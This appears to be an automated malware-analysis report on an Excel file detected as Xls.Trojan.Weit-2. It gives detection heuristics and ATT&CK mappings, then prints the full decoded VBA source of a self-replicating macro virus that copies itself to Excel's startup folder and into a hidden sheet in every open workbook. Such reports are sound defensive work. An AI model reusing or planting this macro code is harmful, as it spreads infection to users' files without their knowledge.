MALICIOUS
300
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document with a high-confidence detection of VBA macros, specifically an Auto_Open macro, indicating it is designed to execute malicious code upon opening. ClamAV signatures identify it as 'Xls.Trojan.Weit-2'. The presence of VBA macros strongly suggests an initial access vector via spearphishing attachment.
Heuristics 6
-
ClamAV: Xls.Trojan.Weit-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Weit-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 23,515 bytes but its declared streams total only 0 bytes — 23,515 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4034 bytes |
SHA-256: 0a38183ea088ae0db0b5d11dcf9b98c0d2b53b9d733b7e319777032ec3ec00a7 |
|||
|
Detection
ClamAV:
Xls.Trojan.Weit-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "EXCELLS"
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim startpfad As String
Application.ScreenUpdating = False
Application.DisplayAlerts = False
startpfad = Application.StartupPath
If Right$(startpfad, 1) = "\" Then
startpfad = startpfad + "_X_X_X_X.XLS"
Else
startpfad = startpfad + "\_X_X_X_X.XLS"
End If
If chk_first_time(startpfad) Then
ActiveWorkbook.SaveCopyAs (startpfad)
Else
Close #1
End If
If Workbooks.Count <= 1 Then
Workbooks.Add
End If
For Each w In Workbooks
If w.Name <> ThisWorkbook.Name Then
If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
Workbooks(w.Name).Sheets("EXCELLS").Visible = False
Application.OnSheetDeactivate = ActiveWorkbook.Name & "!EXCELLS.weitergehts"
End If
End If
Next w
Application.ScreenUpdating = True
If ThisWorkbook.Name = "_X_X_X_X.XLS" Then
ThisWorkbook.Close
Else
ThisWorkbook.Activate
End If
End Sub
Function chk_first_time(datei As String) As Integer
Attribute chk_first_time.VB_ProcData.VB_Invoke_Func = " \n14"
chk_first_time = False
On Error GoTo fehler
Open (datei) For Input As 1
On Error Resume Next
Exit Function
fehler:
chk_first_time = True
Resume Next
End Function
Sub weitergehts()
Attribute weitergehts.VB_ProcData.VB_Invoke_Func = " \n14"
Application.ScreenUpdating = False
Application.DisplayAlerts = False
On Error Resume Next
For Each w In Workbooks
If w.Name <> ThisWorkbook.Name Then
If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
Workbooks(w.Name).Sheets("EXCELLS").Visible = False
Application.OnSheetDeactivate = ""
End If
End If
Next w
Application.ScreenUpdating = True
End Sub
|
|||
embedded_office_off00006c25.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x6C25 | 23515 bytes |
SHA-256: af6379aef62de0d6ebe4cfd10e1d6ab19e187f94abcd6d9e0e703932e9ec79a7 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.